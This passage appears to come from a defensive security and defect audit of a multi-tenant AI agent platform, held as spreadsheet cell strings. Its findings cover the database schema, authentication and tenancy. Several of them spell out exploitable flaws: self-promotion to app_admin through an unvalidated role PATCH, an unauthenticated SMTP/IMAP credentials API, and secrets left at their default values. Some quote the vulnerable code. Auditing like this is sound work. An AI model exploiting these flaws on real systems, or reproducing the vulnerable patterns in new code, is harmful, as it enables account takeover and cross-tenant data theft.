**✅ Verified · Low**
The Backend API has a hardcoded Python list in `main.py`. The gateway has
`CORS_ORIGINS` from the environment. Both use `allow_credentials=True` with
`allow_methods=["*"]`. Adding a hostname means editing two places, and forgetting one
produces a browser-only failure that does not appear in any server log.
- [`backend/src/main.py:11`](../../../backend/src/main.py:11)
- [`gateway/gateway_config.py`](../../../backend/src/gateway/gateway_config.py) — `CORS_ORIGINS`
---</t>
  </si>
  <si>
    <t>SA-20</t>
  </si>
  <si>
    <t>Both shared secrets ship as change-me-in-production</t>
  </si>
  <si>
    <t>### SA-20 — Both shared secrets ship as `change-me-in-production`
**✅ Verified · High**
`INTERNAL_TOKEN` and `JWT_SECRET` both default to the literal string
`change-me-in-production`, in code and in `.env.example`.
`INTERNAL_TOKEN` is the only thing protecting `POST /internal/event`, which can create
executions. `JWT_SECRET` mismatching the API's `SECRET_KEY` does not fail loudly —
JWT decode returns `None`, `TenantContext` is left empty, requests still work, and
gateway-side tenant logging is silently blank.
- [`gateway/gateway_config.py:32`](../../../backend/src/gateway/gateway_config.py:32) and [`:35`](../../../backend/src/gateway/gateway_config.py:35)
**Fix:** refuse to start when either still holds the default value. A failed boot is
much better than a silently unauthenticated internal endpoint.
---</t>
  </si>
  <si>
    <t>SA-21</t>
  </si>
  <si>
    <t>Three different Python versions across the deployment path</t>
  </si>
  <si>
    <t>### SA-21 — Three different Python versions across the deployment path
**✅ Verified · Low**
`setup_production_vm.sh` installs **3.12**. `pyproject.toml` declares
`python = "^3.11"`. `backend/Dockerfile` uses `python:3.11-slim`. Whatever is tested
locally is not necessarily what runs on the VM.
- [`setup_production_vm.sh`](../../../setup_production_vm.sh)
- [`backend/pyproject.toml`](../../../backend/pyproject.toml)
- [`backend/Dockerfile`](../../../backend/Dockerfile)
---</t>
  </si>
  <si>
    <t>DM-01</t>
  </si>
  <si>
    <t>subscription_tiers has no migration</t>
  </si>
  <si>
    <t>03. Database &amp; Data Model</t>
  </si>
  <si>
    <t>### DM-01 — `subscription_tiers` has no migration
**✅ Verified · Critical**
The table is referenced by the ORM (`SubscriptionTier` in `billing_models.py`), by the
credits router, and by the seed path. Nothing in `backend/migrations/` creates it.
Reproduce:
```bash
grep -rl subscription_tiers backend/migrations/
```
That returns nothing. A database built purely from Alembic will not have the table, and
every subscription route fails at the first query.
- [`billing/billing_models.py`](../../../backend/src/billing/billing_models.py) — `SubscriptionTier`
- Also recorded as **D-06** in the platform register
**Fix:** write the migration. It should also seed the three tiers the frontend falls
back to, so the fallback stops being load-bearing.</t>
  </si>
  <si>
    <t>---</t>
  </si>
  <si>
    <t>03-DATA-MODEL-DEFECTS.md</t>
  </si>
  <si>
    <t>2. T0 — The database cannot be rebuilt correctly</t>
  </si>
  <si>
    <t>DM-02</t>
  </si>
  <si>
    <t>phone_numbers is created by a script, not a migration</t>
  </si>
  <si>
    <t>### DM-02 — `phone_numbers` is created by a script, not a migration
**✅ Verified · Critical**
`phone_numbers` — the whole phone-number inventory — is created by
`backend/migrations/merge_phone_tables.py`, a **standalone Python script** that lives
next to the Alembic `versions/` folder but is not part of the chain. It runs raw
`CREATE TABLE` SQL.
The only thing the Alembic chain creates is the legacy `phone_number_pool`, which the
script then drops.
So the documented setup sequence has a manual step between `alembic upgrade head` and
`seed_admin_user.py`, and forgetting it leaves the platform without a phone inventory.
- [`backend/migrations/merge_phone_tables.py`](../../../backend/migrations/merge_phone_tables.py) — the `CREATE TABLE` at line 49
- [`backend/migrations/versions/a1b2c3d4e5f6_add_onboarding_and_phone_pool.py`](../../../backend/migrations/versions/a1b2c3d4e5f6_add_onboarding_and_phone_pool.py) — creates the *legacy* table only
**Fix:** convert the script into a real Alembic revision. Keep it idempotent so
existing databases are unaffected.</t>
  </si>
  <si>
    <t>DM-03</t>
  </si>
  <si>
    <t>feature_flags has no ORM model and is optional</t>
  </si>
  <si>
    <t>### DM-03 — `feature_flags` has no ORM model and is optional
**✅ Verified · Medium**
The table exists only in a migration and is queried with raw SQL from
`core/feature_flags.py`. There is no SQLAlchemy model, so `alembic autogenerate` cannot
see it and will never propose changes to it.
The service is written to tolerate the table being absent — lookups fall through to env
vars and code defaults rather than raising. That is good for resilience and bad for
diagnosis: a database missing the table behaves exactly like a database where every
flag happens to be at its default.
- [`backend/migrations/versions/p11t02_feature_flags.py`](../../../backend/migrations/versions/p11t02_feature_flags.py)
- [`ai/core/feature_flags.py`](../../../backend/src/ai/core/feature_flags.py)
**Fix:** add the ORM model. Keep the fallback, but log once at startup when the table is
missing.
---</t>
  </si>
  <si>
    <t>DM-04</t>
  </si>
  <si>
    <t>billing_events has no unique constraint</t>
  </si>
  <si>
    <t>### DM-04 — `billing_events` has no unique constraint
**✅ Verified · High**
`class BillingEvent` has no `__table_args__` and no `UniqueConstraint`. The logical
upsert key is `(company_id, period_month, grouping_type, grouping_value)` and nothing
enforces it.
Two consequences:
1. Two settlements running concurrently for the same month insert **two rows** instead
   of one updating the other.
2. Every report that sums this table over-counts by exactly the number of duplicates,
   silently.
The only index on the table is `idx_billing_events_grouping` on
`(grouping_type, grouping_value)` — which does not help.
- [`billing/billing_models.py`](../../../backend/src/billing/billing_models.py) — `class BillingEvent`
- Also recorded as **D-07** in the platform register
**Fix:** add the unique constraint and switch the write to `ON CONFLICT DO UPDATE`.</t>
  </si>
  <si>
    <t>De-duplicate existing rows in the same migration.
---</t>
  </si>
  <si>
    <t>3. T1 — Missing constraints and indexes</t>
  </si>
  <si>
    <t>DM-05</t>
  </si>
  <si>
    <t>execution_runs has no index on company_id or entity_id</t>
  </si>
  <si>
    <t>### DM-05 — `execution_runs` has no index on `company_id` or `entity_id`
**✅ Verified · High**
The only index on `execution_runs` besides the primary key is the partial idempotency
index on `idempotency_key WHERE NOT NULL`.
Every "list my runs" query filters on `company_id`. Every "runs for this agent" query
filters on `entity_id`. Both are sequential scans over the whole table, for every
tenant, forever. This is the table that grows fastest.
- [`ai/orm/execution.py`](../../../backend/src/ai/orm/execution.py) — `ExecutionRun`
**Fix:** add `(company_id, created_at DESC)` and `(entity_id, created_at DESC)`. Both
are the shape the list endpoints actually use.
---</t>
  </si>
  <si>
    <t>DM-06</t>
  </si>
  <si>
    <t>Log tables have no indexes at all</t>
  </si>
  <si>
    <t>### DM-06 — Log tables have no indexes at all
**✅ Verified · Medium**
`llm_interaction_logs` and `tool_interaction_logs` have no indexes beyond the primary
key (`tool_interaction_logs` also has the partial idempotency one). Every query filters
on `run_id`. The trace viewer, the cost reports and the tool-efficacy dashboard all read
these tables.
- [`ai/orm/execution.py`](../../../backend/src/ai/orm/execution.py) — `LLMInteractionLog`, `ToolInteractionLog`
**Fix:** index `run_id` on both. It is a one-line migration and the tables only grow.
---</t>
  </si>
  <si>
    <t>DM-07</t>
  </si>
  <si>
    <t>document_chunks.embedding has no ANN index</t>
  </si>
  <si>
    <t>### DM-07 — `document_chunks.embedding` has no ANN index
**✅ Verified · Medium**
`cortex_nodes.embedding` gets a proper HNSW index (`vector_cosine_ops`, `m=16`,
`ef_construction=64`). `document_chunks.embedding` gets nothing.
So the legacy knowledge-base search — the one behind the `/knowledge` page and the
`DOCUMENT` context source — is a **full sequential scan with a cosine distance computed
per row** on every query. It is fast today only because the table is small.
- [`ai/orm/document.py`](../../../backend/src/ai/orm/document.py) — `DocumentChunk`
**Fix:** add the same HNSW index. Or, better, finish the migration to CORTEX Knowledge
Trees and drop the v1 path — see
[08 — Memory &amp; CORTEX](08-MEMORY-AND-CORTEX-DEFECTS.md).
---</t>
  </si>
  <si>
    <t>DM-08</t>
  </si>
  <si>
    <t>tool_registry_entries.name is globally unique across tenants</t>
  </si>
  <si>
    <t>### DM-08 — `tool_registry_entries.name` is globally unique across tenants
**📄 Doc-reported · Medium**
`company_id` is nullable on this table (NULL means a built-in tool), but `name` carries
a **global** unique constraint. So two tenants cannot both register a custom tool called
`crm_sync`. The second one gets a database error from an operation that should be
tenant-local.
- [`ai/orm/tools.py`](../../../backend/src/ai/orm/tools.py)
**Fix:** make it unique on `(company_id, name)` with a partial unique index for the
`company_id IS NULL` built-in case.
---</t>
  </si>
  <si>
    <t>DM-09</t>
  </si>
  <si>
    <t>Log tables have no tenant column, so an unjoined query sees everything</t>
  </si>
  <si>
    <t>### DM-09 — Log tables have no tenant column, so an unjoined query sees everything
**✅ Verified · High**
There is no row-level security and no global query filter. Tenant isolation is a
`WHERE company_id = ...` written by hand in every service method.
These tables have **no `company_id` at all** and can only be scoped by joining their
parent:
| Table | Must join through |
|---|---|
| `llm_interaction_logs` | `execution_runs` |
| `tool_interaction_logs` | `execution_runs` |
| `human_approvals` | `execution_runs` |
| `document_chunks` | `documents` |
| `campaign_calls` | `campaigns` |
| `call_content` | `call_logs` |
| `cortex_nodes`, `cortex_edges` | `cortex_trees` |
Any query on one of them that forgets the join has **no tenant filter whatsoever**. It
returns every tenant's rows and looks perfectly correct in review.</t>
  </si>
  <si>
    <t>`execution_trace_events` has a `company_id` but it is denormalised with **no foreign
key**, so nothing stops it drifting from the run's real owner.
**Fix:** add a denormalised `company_id` to the high-traffic log tables and index it.
Redundancy is the right trade here — a forgotten join becomes a wrong-but-scoped query
instead of a cross-tenant leak.
---</t>
  </si>
  <si>
    <t>DM-10</t>
  </si>
  <si>
    <t>The legacy assets table was never dropped</t>
  </si>
  <si>
    <t>| **DM-10** | The legacy `assets` table was never dropped | The artifacts migration says it "leaves `assets` in place (dropped last after verification)". That follow-up migration does not exist. `op.drop_table('assets')` appears only in the **downgrade** path of the migration that created it | ✅ Verified |</t>
  </si>
  <si>
    <t>4. T2 — Wrong types and dead tables</t>
  </si>
  <si>
    <t>DM-11</t>
  </si>
  <si>
    <t>Four numeric values are stored as text</t>
  </si>
  <si>
    <t>| **DM-11** | Four numeric values are stored as text | `episodic_memories.total_cost_usd` is `String(20)`, `documents.file_size` is `String`, `document_chunks.chunk_index` is `String`, `companies.default_daily_credits` is `String`. Sorting `chunk_index` gives `1, 10, 11, 2`. Summing a cost means casting in every query | ✅ Verified |</t>
  </si>
  <si>
    <t>DM-12</t>
  </si>
  <si>
    <t>Every DateTime column is naive</t>
  </si>
  <si>
    <t>| **DM-12** | Every `DateTime` column is naive | No `timezone=True` anywhere. UTC is a convention held up only by `datetime.utcnow` defaults. One `datetime.now()` slipping in anywhere produces silently wrong timestamps | ✅ Verified |</t>
  </si>
  <si>
    <t>DM-13</t>
  </si>
  <si>
    <t>JSON on old tables, JSONB on new ones</t>
  </si>
  <si>
    <t>| **DM-13** | `JSON` on old tables, `JSONB` on new ones | `JSON` cannot be indexed usefully and re-parses on every read. The split runs right through the entity table — the nine config columns are plain `JSON` | ✅ Verified |</t>
  </si>
  <si>
    <t>DM-14</t>
  </si>
  <si>
    <t>Three columns are literally named metadata</t>
  </si>
  <si>
    <t>| **DM-14** | Three columns are literally named `metadata` | `campaigns`, `campaign_calls` and `cortex_edges`. SQLAlchemy reserves `metadata` on the declarative class, so each maps a different Python attribute. Writing `campaign.metadata` returns the table metadata object, not the JSON, and does so **without raising** | ✅ Verified |</t>
  </si>
  <si>
    <t>DM-15</t>
  </si>
  <si>
    <t>clean_db.sql truncates by a hand-maintained list</t>
  </si>
  <si>
    <t>| **DM-15** | `clean_db.sql` truncates by a hand-maintained list | New tables are not covered until someone adds them. Currently missing: `cortex_edges`, `execution_trace_events`, `source_trust_scores`, `feature_flags`, `lead_queue`, `phone_numbers`. A "clean" dev database keeps stale rows in six tables | ✅ Verified |</t>
  </si>
  <si>
    <t>DM-16</t>
  </si>
  <si>
    <t>Soft delete has no default filter</t>
  </si>
  <si>
    <t>### DM-16 — Soft delete has no default filter
**✅ Verified · High**
Only `hierarchical_entities` is soft-deleted. Deletion sets `status = 'DELETED'` and
`deleted_at`, recursively across descendants.
There is **no default query filter**. Every query must add
`.where(status != "DELETED")` itself. Any query that forgets returns deleted agents as
if they were live — in the entity list, in a template clone, in a child resolution.
- [`ai/service.py:203`](../../../backend/src/ai/service.py:203) — the delete path
- [`ai/orm/entity.py`](../../../backend/src/ai/orm/entity.py) — no filter
**Fix:** a SQLAlchemy `with_loader_criteria` default, or a query helper that every
service is required to use. Relying on discipline has already failed once — the index
`idx_entities_not_deleted` exists precisely because someone noticed the scans.
---</t>
  </si>
  <si>
    <t>5. T3 — Traps that produce wrong answers</t>
  </si>
  <si>
    <t>DM-17</t>
  </si>
  <si>
    <t>Run status transitions are advisory</t>
  </si>
  <si>
    <t>### DM-17 — Run status transitions are advisory
**📄 Doc-reported · Medium**
`validate_transition` warns but never blocks. Illegal state transitions are therefore
reachable, and the status machine in the docs is a description of intent rather than a
constraint.
Separately, `REPAIRING` is **unreachable**: no other status lists it as an allowed
target, so nothing can ever enter it.
- [`ai/schemas/enums.py`](../../../backend/src/ai/schemas/enums.py) — `VALID_TRANSITIONS`
- Also recorded as **D-35** in the platform register
---</t>
  </si>
  <si>
    <t>DM-18</t>
  </si>
  <si>
    <t>artifacts.campaign_id points at the wrong table</t>
  </si>
  <si>
    <t>### DM-18 — `artifacts.campaign_id` points at the wrong table
**📄 Doc-reported · Medium**
The column is called `campaign_id` and its foreign key points at
`hierarchical_entities`, not `campaigns`. Any join written from the name will be wrong,
and the database will happily accept an entity id in a column that reads like a
campaign id.
- [`ai/artifact_models.py`](../../../backend/src/ai/artifact_models.py)
**Fix:** rename the column to say what it holds, or repoint the FK. Do not leave a
column whose name contradicts its constraint.
---</t>
  </si>
  <si>
    <t>DM-19</t>
  </si>
  <si>
    <t>Two migration files share a filename prefix</t>
  </si>
  <si>
    <t>### DM-19 — Two migration files share a filename prefix
**✅ Verified · Low**
`a1b2c3d4e5f6_add_voice_and_whatsapp_streaming_tables.py` and
`a1b2c3d4e5f6_add_onboarding_and_phone_pool.py` share the prefix `a1b2c3d4e5f6_`, but
the second one's `revision` variable is `y2z3a4b5c6d7`.
Alembic keys off the variable, so the chain is correct. Anyone grepping by revision id
finds the wrong file.
---</t>
  </si>
  <si>
    <t>DM-20</t>
  </si>
  <si>
    <t>Some migrations are defensively idempotent because environments drifted</t>
  </si>
  <si>
    <t>### DM-20 — Some migrations are defensively idempotent because environments drifted
**✅ Verified · Low**
Several migrations call `sa.inspect(bind)` and skip work when a table or column already
exists (`p11t02_feature_flags`, `y2z3a4b5c6d7`). The document is honest about why: some
environments were stamped past migrations that never actually ran.
That pattern hides the drift instead of fixing it. A database can be at head and still
be missing a column, and nothing reports it.
**Fix:** a schema-census check comparing `__tablename__` and columns against the live
database. It is the second of the four guardrails named in the platform register.
---</t>
  </si>
  <si>
    <t>AU-01</t>
  </si>
  <si>
    <t>Any admin can promote themselves to app_admin</t>
  </si>
  <si>
    <t>04. Authentication, RBAC &amp; Multi-Tenancy</t>
  </si>
  <si>
    <t>### AU-01 — Any admin can promote themselves to `app_admin`
**✅ Verified · Critical**
`PATCH /api/v1/users/{user_id}` checks two things — same company, and caller is one of
`app_admin` / `partner_admin` / `tenant_admin` — and then does this:
```python
update_data = user_update.model_dump(exclude_unset=True)
for field, value in update_data.items():
    setattr(user, field, value)
```
`UserUpdate` declares `role: Optional[str] = None`. Nothing validates the value.
So a `tenant_admin` can PATCH **their own user row** with `{"role": "app_admin"}` and
become a platform superuser. From there, `app_admin` short-circuits the tenant filter
everywhere, which turns this into a full-database read across every tenant.
The stricter `create_user_as_admin` **does** validate which roles a caller may assign.
The update path simply never got the same treatment.</t>
  </si>
  <si>
    <t>- [`auth/user_router.py:48`](../../../backend/src/auth/user_router.py:48) — `update_user`
- [`auth/schemas.py`](../../../backend/src/auth/schemas.py) — `UserUpdate.role`
- [`auth/service.py:52`](../../../backend/src/auth/service.py:52) — the correct pattern, for contrast
**Fix:** run the same assignable-role check the create path uses, and refuse a role
change on the caller's own row entirely.
---</t>
  </si>
  <si>
    <t>04-AUTH-RBAC-TENANCY-DEFECTS.md</t>
  </si>
  <si>
    <t>2. T0 — Privilege escalation and open doors</t>
  </si>
  <si>
    <t>AU-02</t>
  </si>
  <si>
    <t>The email connection API has no authentication at all</t>
  </si>
  <si>
    <t>### AU-02 — The email connection API has no authentication at all
**✅ Verified · Critical**
All five routes on `/api/v1/email/*` depend on `get_db` and nothing else. No
`get_current_user`, no `RoleChecker`.
```
POST   /email/connections            create
GET    /email/connections            list
DELETE /email/connections/{id}       delete
POST   /email/connections/{id}/validate
GET    /email/provider-defaults
```
The router creates, lists, deletes and validates **SMTP/IMAP credentials**. That makes
it the highest-value unauthenticated surface in the tree.
Two of the routes are worse than "unauthenticated": `DELETE` and `validate` look up by
`connection_id` alone with no ownership check. `validate` **decrypts another tenant's
app password and attempts an IMAP login with it**.</t>
  </si>
  <si>
    <t>The code's own comment admits the design:
```python</t>
  </si>
  <si>
    <t>AU-03</t>
  </si>
  <si>
    <t>Any user can suspend their own company</t>
  </si>
  <si>
    <t>### AU-03 — Any user can suspend their own company
**✅ Verified · Critical**
`PATCH /api/v1/companies/{company_id}` guards on company match only:
```python
if current_user.role != "app_admin" and current_user.company_id != company_id:
    raise HTTPException(status_code=403, detail="Not authorized to update this company")
```
There is **no role check**. Any authenticated user — including a `tenant_user` — can
PATCH their own company with `{"status": "suspended"}` and lock the entire company out
of the platform, its admins included. Nothing else in the product sets that status, so
recovery needs an `app_admin`.
The inline comment on the next line (`Also allow partner admins to update their own
tenants?`) shows this was known to be unfinished.
- [`auth/company_router.py:110`](../../../backend/src/auth/company_router.py:110) — `update_company`
**Fix:** add a role check. `status` in particular should be `app_admin` only.</t>
  </si>
  <si>
    <t>AU-04</t>
  </si>
  <si>
    <t>is_active is never checked, so deactivating a user does nothing</t>
  </si>
  <si>
    <t>### AU-04 — `is_active` is never checked, so deactivating a user does nothing
**✅ Verified · High**
`users.is_active` exists, defaults to `True`, is editable through `UserUpdate`, and is
shown in the partner dashboard. Neither `authenticate_user` nor `_authenticate_user`
ever reads it.
An admin who deactivates a user in the UI sees the flag flip and reasonably believes
that person is locked out. They can still log in and still use every API.
- [`auth/service.py`](../../../backend/src/auth/service.py) — `authenticate_user`
- [`auth/dependencies.py`](../../../backend/src/auth/dependencies.py) — `_authenticate_user`
**Fix:** reject inactive users in `_authenticate_user`, next to the existing suspension
check. One line.
---</t>
  </si>
  <si>
    <t>AU-05</t>
  </si>
  <si>
    <t>Access tokens cannot be revoked</t>
  </si>
  <si>
    <t>### AU-05 — Access tokens cannot be revoked
**✅ Verified · High**
The JWT carries `sub`, `company_id` and `exp`. There is no `jti`, no denylist, and no
logout endpoint. Logging out clears `localStorage` on the client and nothing else.
A stolen access token is valid for up to 30 minutes and nothing can stop it. A stolen
refresh token is valid for up to 7 days — see
[AU-09](#au-09--refresh-token-reuse-is-detected-and-ignored).
- [`common/security.py`](../../../backend/src/common/security.py) — `create_access_token`
- [`auth/dependencies.py`](../../../backend/src/auth/dependencies.py) — the validator
**Fix:** the cheapest version is a `token_version` integer on `users`, put in the token
and compared on every request. Bumping it invalidates every token for that user
instantly, which also gives [AU-09](#au-09--refresh-token-reuse-is-detected-and-ignored)
somewhere to act.
---</t>
  </si>
  <si>
    <t>AU-06</t>
  </si>
  <si>
    <t>Password reset works in the browser and does not exist in the backend</t>
  </si>
  <si>
    <t>### AU-06 — Password reset works in the browser and does not exist in the backend
**✅ Verified · High**
The frontend has a complete two-page reset flow, routed at `/forgot-password` and
`/reset-password`. It calls `POST /auth/forgot-password` and `POST /auth/reset-password`.
**Neither endpoint exists.** Grepping the whole backend for `forgot`, `reset-password`
or `new_password` returns nothing. Both pages show "Failed to send reset email" against
a 404.
A user who forgets their password today has no recovery path at all short of an admin
editing the database.
- [`frontend/src/pages/auth/PasswordReset.tsx:23`](../../../frontend/src/pages/auth/PasswordReset.tsx:23), [`:121`](../../../frontend/src/pages/auth/PasswordReset.tsx:121)
- [`frontend/src/router/index.tsx:121`](../../../frontend/src/router/index.tsx:121)–122 — the routes
- [`auth/router.py`](../../../backend/src/auth/router.py) — no matching routes
**Fix:** implement both endpoints. The verification-email machinery in
[`common/email.py`](../../../backend/src/common/email.py) already has the token minting
and send path to copy.</t>
  </si>
  <si>
    <t>3. T1 — Controls that are not enforced</t>
  </si>
  <si>
    <t>AU-07</t>
  </si>
  <si>
    <t>There is no password policy on the server</t>
  </si>
  <si>
    <t>### AU-07 — There is no password policy on the server
**✅ Verified · High**
`UserCreate.password` is a bare `str`. No minimum length, no complexity rule, no breach
check. A one-character password is accepted by the API.
The only policy in the codebase is client-side, in the reset page that cannot work:
```tsx
if (password.length &lt; 12) { setError('Password must be at least 12 characters long'); return; }
```
That runs in the browser and is bypassed by any direct API call.
There is also **no rate limit on `/auth/login`**. The gateway's blanket
`200/minute` per IP is the only thing between an attacker and unlimited password
guessing.
- [`auth/schemas.py`](../../../backend/src/auth/schemas.py) — `UserCreate`
- [`frontend/src/pages/auth/PasswordReset.tsx:108`](../../../frontend/src/pages/auth/PasswordReset.tsx:108)</t>
  </si>
  <si>
    <t>**Fix:** a Pydantic validator with a length minimum, plus a per-email login rate limit.
---</t>
  </si>
  <si>
    <t>AU-08</t>
  </si>
  <si>
    <t>is_verified gates nothing</t>
  </si>
  <si>
    <t>### AU-08 — `is_verified` gates nothing
**✅ Verified · Medium**
Self-registered users get `is_verified = False` **and a working access token in the same
response**. Nothing anywhere checks the flag. The verification email exists and the
verify endpoint works, but completing it changes no behaviour.
Worse, the email links to `/verify-email`, and that route **does not exist in the
frontend router** — it falls through the catch-all to `/dashboard`. So the user clicks
the link, lands on the dashboard, and the token is never presented to the endpoint.
- [`auth/service.py`](../../../backend/src/auth/service.py) — `create_user`
- [`common/email.py:183`](../../../backend/src/common/email.py:183) — the link builder
- [`frontend/src/router/index.tsx`](../../../frontend/src/router/index.tsx) — no `/verify-email` route
---</t>
  </si>
  <si>
    <t>AU-09</t>
  </si>
  <si>
    <t>Refresh token reuse is detected and ignored</t>
  </si>
  <si>
    <t>### AU-09 — Refresh token reuse is detected and ignored
**✅ Verified · Medium**
Presenting a revoked refresh token is the classic signal that a token family has been
stolen. The code spots it and comments on the correct response without doing it:
```python
if refresh_token.revoked:
    # Security alert: Attempt to use revoked token
    # In a real system, we might revoke all tokens for this user
    raise HTTPException(status_code=401, detail="Token revoked")
```
Only that one request is rejected. The attacker's freshly rotated token stays live for
the rest of its 7 days.
- [`auth/service.py:186`](../../../backend/src/auth/service.py:186)
**Fix:** revoke every token for that user. Pairs directly with the `token_version` idea
in [AU-05](#au-05--access-tokens-cannot-be-revoked).</t>
  </si>
  <si>
    <t>AU-10</t>
  </si>
  <si>
    <t>Refresh tokens are stored in plaintext</t>
  </si>
  <si>
    <t>### AU-10 — Refresh tokens are stored in plaintext
**📄 Doc-reported · Medium**
`refresh_tokens.token` holds the 32-byte secret as-is, `unique=True, index=True`. Any
read access to that table — a backup, a log, a SQL injection elsewhere — is a set of
working 7-day credentials for every active user.
- [`auth/models.py`](../../../backend/src/auth/models.py) — `RefreshToken`
**Fix:** store a SHA-256 hash and look up by hash. The token is already high-entropy, so
no salt or slow hash is needed.
---</t>
  </si>
  <si>
    <t>AU-11</t>
  </si>
  <si>
    <t>The gateway's JWT secret does not match the API's</t>
  </si>
  <si>
    <t>### AU-11 — The gateway's JWT secret does not match the API's
**✅ Verified · Medium**
The backend signs with `SECRET_KEY`. The gateway decodes with `JWT_SECRET`. They are
different settings, and in the checked-in `.env` they hold different values.
`GatewayAuthMiddleware._decode_jwt` therefore fails silently on every request,
`request.state.tenant.company_id` is always `None`, and gateway-level tenant metrics are
permanently empty. Nothing errors; the data is just blank.
- [`gateway/gateway_config.py:35`](../../../backend/src/gateway/gateway_config.py:35)
- [`gateway/auth_middleware.py`](../../../backend/src/gateway/auth_middleware.py)
**Fix:** have the gateway read `SECRET_KEY` from the shared settings object. See also
[SA-20](02-SYSTEM-ARCHITECTURE-DEFECTS.md#sa-20--both-shared-secrets-ship-as-change-me-in-production).
---</t>
  </si>
  <si>
    <t>AU-12</t>
  </si>
  <si>
    <t>There is no logout endpoint</t>
  </si>
  <si>
    <t>### AU-12 — There is no logout endpoint
**✅ Verified · Medium**
Logout is `localStorage.removeItem(...)` in the browser. The refresh-token row stays
`revoked = false` and valid for up to 7 days. Signing out on a shared computer does not
end the session.
**Fix:** `POST /auth/logout` that revokes the presented refresh token. Two lines with
the service that already exists.
---</t>
  </si>
  <si>
    <t>4. T2 — Missing pieces</t>
  </si>
  <si>
    <t>AU-13</t>
  </si>
  <si>
    <t>The internal token is compared with !=</t>
  </si>
  <si>
    <t>### AU-13 — The internal token is compared with `!=`
**📄 Doc-reported · Medium**
`X-Internal-Token` is checked with a plain `token != settings.INTERNAL_TOKEN`, not
`hmac.compare_digest`. That is a timing side channel on a shared secret that guards an
endpoint capable of creating executions.
Combined with the default value still being `change-me-in-production` in the checked-in
`.env`, the timing channel is currently the smaller problem.
- [`gateway/auth_middleware.py`](../../../backend/src/gateway/auth_middleware.py)
---</t>
  </si>
  <si>
    <t>AU-14</t>
  </si>
  <si>
    <t>The type claim is not checked on login tokens</t>
  </si>
  <si>
    <t>### AU-14 — The `type` claim is not checked on login tokens
**✅ Verified · Medium**
`create_access_token` mints both login tokens and email-verification tokens. The only
difference is a `type` claim, and `_authenticate_user` **never inspects it**.
The verification path checks `type == "email_verification"` correctly, so a login token
cannot be replayed there. The reverse is open: any code that mints a token with
`type: email_verification` is minting something `get_current_user` will accept as a
full login token.
- [`common/security.py`](../../../backend/src/common/security.py) — `create_access_token`
- [`auth/service.py:277`](../../../backend/src/auth/service.py:277) — `verify_email_token`
**Fix:** require `type == "access"` in `_authenticate_user` and stamp it at mint time.
---</t>
  </si>
  <si>
    <t>AU-15</t>
  </si>
  <si>
    <t>Partner admins cannot manage the tenants they create</t>
  </si>
  <si>
    <t>### AU-15 — Partner admins cannot manage the tenants they create
**✅ Verified · Medium**
The same missing role logic as [AU-03](#au-03--any-user-can-suspend-their-own-company),
seen from the other side. `update_company` allows `app_admin` or "your own company"
only. A `partner_admin` can create a tenant and then cannot rename it, suspend it, or
change anything about it.
The whole `/partner/*` router is read-only as a result. Partner self-service is a stated
product goal that the guard blocks.
- [`auth/company_router.py:110`](../../../backend/src/auth/company_router.py:110)
---</t>
  </si>
  <si>
    <t>AU-16</t>
  </si>
  <si>
    <t>The refresh cookie nobody reads</t>
  </si>
  <si>
    <t>### AU-16 — The refresh cookie nobody reads
**✅ Verified · Low**
`/auth/register`, `/auth/login`, `/auth/refresh` and `/auth/oauth/{provider}` all set an
`HttpOnly; Secure; SameSite=lax` cookie named `refresh_token`. Nothing reads it. The
refresh endpoint takes the token from the JSON body and the frontend reads it from
`localStorage`.
Harmless today, and it is exactly the right foundation for moving refresh tokens out of
`localStorage` — which is the fix for a real problem. Listed so the cookie is not
deleted by mistake.
---</t>
  </si>
  <si>
    <t>AU-17</t>
  </si>
  <si>
    <t>Two functions named _require_admin mean different things</t>
  </si>
  <si>
    <t>### AU-17 — Two functions named `_require_admin` mean different things
**✅ Verified · Medium**
| Helper | File | Who counts as admin |
|---|---|---|
| `_require_admin` | [`ai/api/admin.py:91`](../../../backend/src/ai/api/admin.py:91) | `app_admin`, `partner_admin`, **`tenant_admin`** |
| `_require_admin` | [`billing/cron_router.py:16`](../../../backend/src/billing/cron_router.py:16) | `app_admin` only |
| `_require_app_admin` | [`config/router.py:156`](../../../backend/src/config/router.py:156) | `app_admin` only |
| `_require_roles(user, *roles)` | [`ai/reports_router.py:24`](../../../backend/src/ai/reports_router.py:24) | varies per endpoint |
Four guard styles, two of them sharing a name and disagreeing. Reading a route's
decorator does not tell you who can call it — you have to follow the import.
**Fix:** one guard mechanism, `RoleChecker`, everywhere. Delete the hand-rolled ones.
---</t>
  </si>
  <si>
    <t>5. T3 — Inconsistency and dead weight</t>
  </si>
  <si>
    <t>AU-18</t>
  </si>
  <si>
    <t>There is no hierarchy, so app_admin can be locked out by omission</t>
  </si>
  <si>
    <t>### AU-18 — There is no hierarchy, so `app_admin` can be locked out by omission
**✅ Verified · Medium**
`RoleChecker` is a flat set-membership test. `app_admin` is **not** implicitly allowed
anywhere — it only gets through a guard whose list literally contains `"app_admin"`.
Every guard in the codebase spells it out by hand today, so it works. One forgotten
entry silently locks the platform administrator out of an endpoint, and the failure looks
like a bug in the feature rather than in the guard.
- [`auth/dependencies.py`](../../../backend/src/auth/dependencies.py) — `RoleChecker`
---</t>
  </si>
  <si>
    <t>AU-19</t>
  </si>
  <si>
    <t>app_user is a role with almost no meaning</t>
  </si>
  <si>
    <t>### AU-19 — `app_user` is a role with almost no meaning
**✅ Verified · Low**
`app_user` appears in exactly three backend lines, all in `reports_router.py`. It is in
no `RoleChecker` list, so it is rejected from `/companies/partners`,
`/companies/tenants`, `POST /companies`, `POST /users` and the whole `/partner/*` tree.
`GET /companies` falls into the `else` branch and returns "own company only" — the same
as a tenant user. In practice `app_user` is a tenant user with two extra report pages,
despite being documented as a platform operations role.
---</t>
  </si>
  <si>
    <t>AU-20</t>
  </si>
  <si>
    <t>Five independent copies of "own company plus children"</t>
  </si>
  <si>
    <t>### AU-20 — Five independent copies of "own company plus children"
**📄 Doc-reported · Medium**
The cascade logic appears separately in `user_router`, `company_router`, `ai/router`,
`ai/service` and `phone_number_router`. They already disagree about what `partner_user`
can see.
Five copies means five places to fix when the rule changes, and five places for a
tenant-boundary bug to hide.
**Fix:** one `visible_company_ids(user)` helper. Every scoped query takes its result.
---</t>
  </si>
  <si>
    <t>AU-21</t>
  </si>
  <si>
    <t>The role strings exist as a comment, not an enum</t>
  </si>
  <si>
    <t>### AU-21 — The role strings exist as a comment, not an enum
**✅ Verified · Low**
The six roles are declared as a comment on `users.role` in the backend and as a real
TypeScript enum on the frontend. There is no Python enum. Every guard list is a list of
string literals, so a typo — `"tenant-admin"` for `"tenant_admin"` — produces a guard
that silently allows nobody.
